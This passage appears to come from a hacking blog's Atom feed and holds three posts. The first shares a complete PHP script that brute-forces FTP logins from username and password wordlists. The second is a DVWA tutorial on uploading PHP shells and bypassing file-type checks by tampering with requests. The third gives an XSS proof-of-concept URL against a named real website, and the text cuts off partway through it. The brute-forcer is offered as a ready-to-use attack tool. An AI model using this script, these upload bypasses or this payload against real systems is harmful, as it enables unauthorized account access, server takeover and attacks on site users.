&lt;code&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: orange;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span style=&quot;font-size: large;&quot;&gt;Today I&#39;m Sharing &lt;span style=&quot;color: red;&quot;&gt;Brute Force&lt;/span&gt; PHP Script&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&lt;code&gt;
 &lt;br /&gt;
function brute_ftp ($h, $p, $user, $pass)&lt;br /&gt;
{&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if ($connect = @ftp_connect ($h, $p))&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if (@ftp_login ($connect, $user, $pass))&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;echo &quot;\nCracked : \n\tHost : $h\n\tUsername = $user\n\tPassword = $pass\n&quot;;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;ftp_close ($connect);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;exit (0);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;else&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;echo &quot;Error with Username \&quot;$user\&quot; &amp;amp; Password \&quot;$pass\&quot;\n&quot;;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;else&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;die (&quot;Cannot Connect to FTP Host \&quot;$h\&quot; !\n&quot;);&lt;br /&gt;
}&lt;br /&gt;
 &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;echo &quot;&lt;br /&gt;
______ ___________&amp;nbsp;&amp;nbsp;______&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;_&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;______&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br /&gt;
|&amp;nbsp;&amp;nbsp;___|_&amp;nbsp;&amp;nbsp; _| ___ \ | ___ \&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;| |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;___|&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br /&gt;
| |_&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;| | | |_/ / | |_/ /_ __ _&amp;nbsp;&amp;nbsp; _| |_ ___&amp;nbsp;&amp;nbsp;| |_ ___&amp;nbsp;&amp;nbsp;_ __ ___ ___ _ __&lt;br /&gt;
|&amp;nbsp;&amp;nbsp;_|&amp;nbsp;&amp;nbsp; | | |&amp;nbsp;&amp;nbsp;__/&amp;nbsp;&amp;nbsp;| ___ \ &#39;__| | | | __/ _ \ |&amp;nbsp;&amp;nbsp;_/ _ \| &#39;__/ __/ _ \ &#39;__|&lt;br /&gt;
| |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | | | |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | |_/ / |&amp;nbsp;&amp;nbsp;| |_| | ||&amp;nbsp;&amp;nbsp;__/ | || (_) | | | (_|&amp;nbsp;&amp;nbsp;__/ |&amp;nbsp;&lt;br /&gt;
\_|&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; \_/ \_|&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; \____/|_|&amp;nbsp;&amp;nbsp; \__,_|\__\___| \_| \___/|_|&amp;nbsp;&amp;nbsp;\___\___|_|\n\n&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[*]-------------------------------------------------[*]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[+] Script Name : FTP Brute Forcer&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[*]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[+] Version : 2.0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; [*]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[+] Coded By : Yunus Incredibl + H Damas Sy&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; [*]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[+] Contact us :&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[*]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[+]&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;https://www.facebook.com/yunusdfgdfg123155&amp;nbsp;&amp;nbsp; [*]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[+]&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;https://www.facebook.com/hdamas.sy.7509&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[*]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[*]------------------------------------------------ [*]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;\n\tUsage : php $argv[0] host port user.txt pass.txt\r\n\r\n&quot;;&lt;br /&gt;
 &lt;br /&gt;
if (isset ($argv[1]) &amp;amp;&amp;amp; isset ($argv[2]) &amp;amp;&amp;amp; isset ($argv[3]) &amp;amp;&amp;amp; isset ($argv[4]))&lt;br /&gt;
{&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$host = $argv[1];&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$port = $argv[2];&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$userfile = $argv[3];&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$passfile = $argv[4];&lt;br /&gt;
 &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if (!file_exists ($userfile))&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;die (&quot;File $userfile not found !\n&quot;);&lt;br /&gt;
 &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if (!file_exists ($passfile))&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;die (&quot;File $passfile not found !\n&quot;);&lt;br /&gt;
 &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$users = explode (&quot;\n&quot;, @file_get_contents ($userfile));&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$passs = explode (&quot;\n&quot;, @file_get_contents ($passfile));&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;foreach ($users as $user)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$user = trim ($user);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;foreach ($passs as $pass)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$pass = trim ($pass);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;brute_ftp ($host, $port, $user, $pass);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;
}&lt;br /&gt;
?&amp;gt; &lt;/code&gt;&lt;/code&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/223961266528358915/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/BruteForce-PhpScript.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/223961266528358915'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/223961266528358915'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/BruteForce-PhpScript.html' title='FTP Brute Force PHP Script - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-7731230049119213111</id><published>2014-03-15T21:09:00.000+05:00</published><updated>2014-03-15T21:09:55.632+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Website Hacking"/><title type='text'>File Upload Vulnerability - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: #ffe599;&quot;&gt;
Hello Friends&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
Well do you know the most easiest &amp;amp; common way to hack a site is 
Shell Upload. To be honest i&#39;m not going to teach you to hack any site 
or server, I&#39;m just sharing what I know besides hacking is really very 
cool, when you learn new things. &lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;
&lt;/span&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;What Do I Need ?&lt;/span&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
    DVWA Penetration Testing Lab&lt;br /&gt;
    Burp Suite or (Live HTTP Headers)&lt;br /&gt;
    Recommended - Mozilla Firefox&lt;br /&gt;
    Any PHP File or Shell&lt;br /&gt;
    Brain, Curiosity &amp;amp; Patience&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;Description &amp;amp; Methodologies&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
      &lt;br /&gt;
File Upload Vulnerability, allows an attacker to upload any scripted 
(static or dynamic) files on target server. (It&#39;s really very dangerous)
 Assume you create a Site in PHP / MySQL. You also create simple Image 
Uploading Application so users can upload their own image file, but 
without any validation yours application blindly trusts on users file 
and upload it on your server.&lt;br /&gt;
&lt;br /&gt;
So what if an evil minded hacker like you determine it and upload .PHP 
file instead of Image file ?, Well your application will accept it &amp;amp;
 store it in server, Now an attacker will locate that file into Browser 
and it will be executed as .PHP scripted file, through this an attacker 
can also upload malicious shells and get complete access to Database 
&amp;amp; Server.&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;Go on &amp;amp; Learn This Holy Hacky Method!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1. Start DVWA, Put Security to Low Level, &amp;amp; Click on Upload.&lt;br /&gt;
&lt;br /&gt;
2. First we&#39;ll exploit easy application, that doesn&#39;t validates user&#39;s 
file. Well you can also go through &#39;View Source&#39;, to understand how it 
really works.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
3. So first of all let&#39;s exploit LOW LEVEL security. There&#39;s an 
application that allows you to upload image file. Click on Browse choose
 your any PHP or HTML scripted file (Like deface page or HACKED!) well 
you can also use any Shells like C99. Remember there&#39;s no security on 
EASY Level, it&#39;ll blindly trust on your file and upload it on it&#39;s 
server directory. It will be little hard on Medium Level.&lt;br /&gt;
Below i&#39;m using simple &#39;HACKED&#39; page&lt;br /&gt;
&lt;br /&gt;
I&#39;ve named it w0rm.php on my desktop and here i upload it on dvwa.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
4. Click on upload and it&#39;ll show you a successfully uploaded message 
with file directory! wow that&#39;s amazing let&#39;s locate that file into 
browser. Copy that directory location and run it in your browser after 
dvwa path.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now check the result, poor DVWA... hahaha no issue!&lt;br /&gt;
&lt;br /&gt;
5. So we&#39;ve successfully exploited easy level. Well an attacker can also
 upload dangerous shells that can completely take over server, data and 
even rooting an entire server. So let&#39;s move on little hard stage. 
(Change Security level to Medium). Now try to upload the same file in 
Medium Level and observe what&#39;s the result. Well you&#39;ll get an error 
message on top - that your image was not uploaded.. Because it&#39;s not an 
image. Now switch to firefox with Tamper Data Addon to modify headers 
while transmission.&lt;br /&gt;
&lt;br /&gt;
6. It&#39;s time for little trick : Rename your file with w0rm.php.jpg to confuse interpreter.&lt;br /&gt;
&lt;br /&gt;
7. Up till now we didn&#39;t trapped any GET or POST request but now we&#39;ll 
do it, now again try to upload it but before clicking on upload start 
Tamper Data and click on Start Tamper to trap every request.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
8. &quot;Start Tamper&quot; and click on Upload. And suddenly you&#39;ll get a pop-up - Click on Tamper : (Now we&#39;ve to modify POST data)&lt;br /&gt;
&lt;br /&gt;
9. Now Look into POST_DATA - Yes! we&#39;ve to modify that stuff only, Just 
go in that text-area and search for your file name - at last change it 
to w0rm.php from w0rm.php.jpg and click on OK- [That&#39;s called BYPASSING 
application validation]&lt;br /&gt;
&lt;br /&gt;
10. You&#39;ll see a successfully uploaded message, again locate it in your browser and watch.. IT&#39;S HACKED! [Cool isn&#39;t it ?]&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/7731230049119213111/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/FileUploadVulnerability.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/7731230049119213111'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/7731230049119213111'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/FileUploadVulnerability.html' title='File Upload Vulnerability - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-5938438804409137431</id><published>2014-03-15T14:52:00.001+05:00</published><updated>2014-03-15T14:52:16.654+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><title type='text'> Cross Site Scripting (XSS) Found in GoAnimate - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h3 class=&quot;post-title entry-title&quot; itemprop=&quot;name&quot;&gt;
&lt;br /&gt;&lt;/h3&gt;
&lt;b&gt;
&lt;/b&gt;&lt;div class=&quot;post-header&quot;&gt;

&lt;/div&gt;
&lt;b&gt;

&lt;/b&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;
&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif; font-size: large; line-height: 18.2px;&quot;&gt;Description:-&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &#39;PT Sans&#39;,Arial,Helvetica,sans-serif; font-size: 13px; line-height: 20px;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; font-size: x-small;&quot;&gt;&lt;br style=&quot;line-height: 18.200000762939453px;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; line-height: 18.200000762939453px;&quot;&gt;An independent vulnerability researcher has discovered a
 Cross-Site Scripting (XSS) vulnerability&amp;nbsp;in&amp;nbsp;GoAnimate Website 
www.goanimate.com, which can be exploited by an attacker to conduct XSS 
attacks.&lt;/span&gt;&lt;br style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18.200000762939453px;&quot; /&gt;&lt;br /&gt;&lt;br style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18.200000762939453px;&quot; /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-family: Verdana, sans-serif; font-size: large; line-height: 18.200000762939453px;&quot;&gt;Proof of concept:-&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;br style=&quot;font-family: &#39;PT Sans&#39;,Arial,Helvetica,sans-serif; font-size: 13px; line-height: 20px;&quot; /&gt;&lt;/b&gt;&lt;a href=&quot;https://www.blogger.com/goog_1417821523&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;
&lt;/span&gt;&lt;/a&gt;&lt;b&gt;&lt;a href=&quot;http://goanimate.com/ajax/siteNav?jsoncallback=jQuery110209239860572852194_1393431502326%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28932656%29%3C/ScRiPt%3E&amp;amp;_=1393431502327&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: PT Sans,Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 20px;&quot;&gt;http://goanimate.com/ajax/siteNav?jsoncallback=jQuery110209239860572852194_1393431502326%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28932656%29%3C/ScRiPt%3E&amp;amp;_=1393431502327&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style=&quot;font-family: PT Sans,Arial,Helvetica,sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style=&quot;font-family: PT Sans,Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 20px;&quot;&gt;Mozilla POC :-&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style=&quot;font-family: PT Sans,Arial,Helvetica,sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-rQAmBJN-lAk/UyKzP-_mJLI/AAAAAAAAADo/ww7ZHSQS2ag/s1600/Screenshot_1.jpg&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;207&quot; src=&quot;http://3.bp.blogspot.com/-rQAmBJN-lAk/UyKzP-_mJLI/AAAAAAAAADo/ww7ZHSQS2ag/s280/Screenshot_1.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
